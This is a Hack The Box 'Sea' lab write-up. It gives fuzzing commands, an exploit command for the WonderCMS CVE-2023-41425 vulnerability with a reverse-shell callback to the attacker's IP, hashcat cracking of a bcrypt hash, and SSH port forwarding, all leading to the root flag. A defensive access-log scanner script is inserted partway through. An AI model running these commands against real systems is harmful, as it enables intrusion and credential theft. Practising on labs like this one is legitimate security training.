
Sea HTB Writeup

First, I scanned the ports with nmap.

Two services are running on the target machine. I looked at the web service and scanned its directories with gobuster.

All endpoints return either 403 or 301, so I couldn't find more information about the website. Let's go deeper. I scanned every endpoint until I found valuable information.

ffuf -c -w /SecLists-2024.4/Discovery/Web-Content/quickhits.txt -u "http://sea.htb/themes/bike/FUZZ" -t 200 -fc 403
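
Seen from the defender's side, this kind of content discovery is loud in the web server's access log: one client, many distinct paths, almost all answered with 403 or 404. The following is an added example, not part of the original writeup, that flags such clients in combined-format log lines; the sample log lines, the thresholds and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Combined Log Format: ip - - [time] "METHOD path proto" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_scanners(lines, min_requests=20, min_error_ratio=0.9, min_unique_paths=15):
    """Return {ip: stats} for clients whose traffic looks like content discovery.

    The thresholds are assumptions; tune them against your own baseline.
    """
    stats = defaultdict(lambda: {"total": 0, "errors": 0, "paths": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing
        ip, _method, path, status = m.groups()
        s = stats[ip]
        s["total"] += 1
        s["paths"].add(path)
        if status in ("403", "404"):
            s["errors"] += 1
    flagged = {}
    for ip, s in stats.items():
        ratio = s["errors"] / s["total"]
        if (s["total"] >= min_requests and ratio >= min_error_ratio
                and len(s["paths"]) >= min_unique_paths):
            flagged[ip] = {"requests": s["total"], "error_ratio": round(ratio, 2),
                           "unique_paths": len(s["paths"])}
    return flagged

def build_sample_log():
    """Constructed sample: one noisy client and one normal visitor."""
    ts = "[10/Aug/2024:12:00:00 +0000]"
    lines = []
    for i in range(40):  # wordlist-style requests, nearly all rejected
        status = 200 if i == 7 else 403
        lines.append(f'198.51.100.7 - - {ts} "GET /themes/bike/word{i} HTTP/1.1" '
                     f'{status} 199 "-" "fuzzer"')
    for path in ("/", "/contact.php", "/themes/bike/css/style.css"):
        lines.append(f'203.0.113.5 - - {ts} "GET {path} HTTP/1.1" 200 1024 "-" "Mozilla/5.0"')
    lines.append("garbage line that does not parse")
    return lines

if __name__ == "__main__":
    for ip, info in find_scanners(build_sample_log()).items():
        print(ip, info)
```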

I found the website's CMS. Its name is WonderCMS, and I searched for whether it has a vulnerability. Luckily, I found an exploit.

https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE
python3 CVE-2023-41425.py -rhost http://sea.htb/loginURL -lhost 10.10.14.17 -lport 9001 -sport 8000

There is a database.js file under var/www/sea/data.

The hash is a bcrypt hash, and I cracked it with hashcat.

hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

I looked at the users under the home directory.

I tried 2 users; amay works for the SSH connection, and I got the user flag.

After running the netstat command, there are open ports whose numbers may help to find a new clue.

netstat -tlnp

I set up port forwarding with the ssh command.

ssh -L 8888:localhost:8080 amay@sea.htb

I logged in with amay's credentials.

I have analyzed

I clicked the analyze button.

I looked at the access.log directory to understand which user created the file.

The file was created by root. I opened Burp Suite and examined the request. I changed the request and finally got the root flag.
